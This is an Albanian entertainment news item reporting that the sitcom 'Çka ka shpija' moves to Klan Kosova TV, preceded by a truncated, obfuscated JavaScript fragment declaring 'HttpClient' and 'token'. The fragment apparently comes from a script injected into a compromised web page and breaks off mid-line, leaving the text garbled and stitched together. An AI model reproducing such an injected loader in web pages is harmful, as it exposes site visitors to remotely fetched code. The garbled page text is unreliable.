;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

‘Çka ka shpija’ me shtëpi të re mediatike, nga tani e tutje në Klan Kosova

By

Prej afro tetë vitesh është etabluar si një prej serialeve vendore më të shikuara.

“Çka ka shpija” nga sezoni në sezon ka kaluar sfidën më të rëndësishme – atë të konsistencës dhe pëlqyershmërisë nga ana e audiencës.

Pak ditë më parë, një prej aktoreve kryesore, Fiona Gllavica, e ftuar në Prive, ‘ngacmoi’ me idenë e risive në serial.

Me Vitin e Ri, “Çka ka shpija” do të ketë adresë të re. Shtëpia e re e serialit është televizioni Klan Kosova.

Lajmi është konfirmuar përmes postimeve në rrjete sociale të producentit Naser Rafuna me fotografi nga nënshkrimi i kontratës me drejtorin e Klan Kosova, Adriatik Kelmendi.

Pritja merr fund shumë shpejt kur “Çka ka shpija” rikthehet me sezonin e ri. /Prive.al

Artikuj të ngjashëm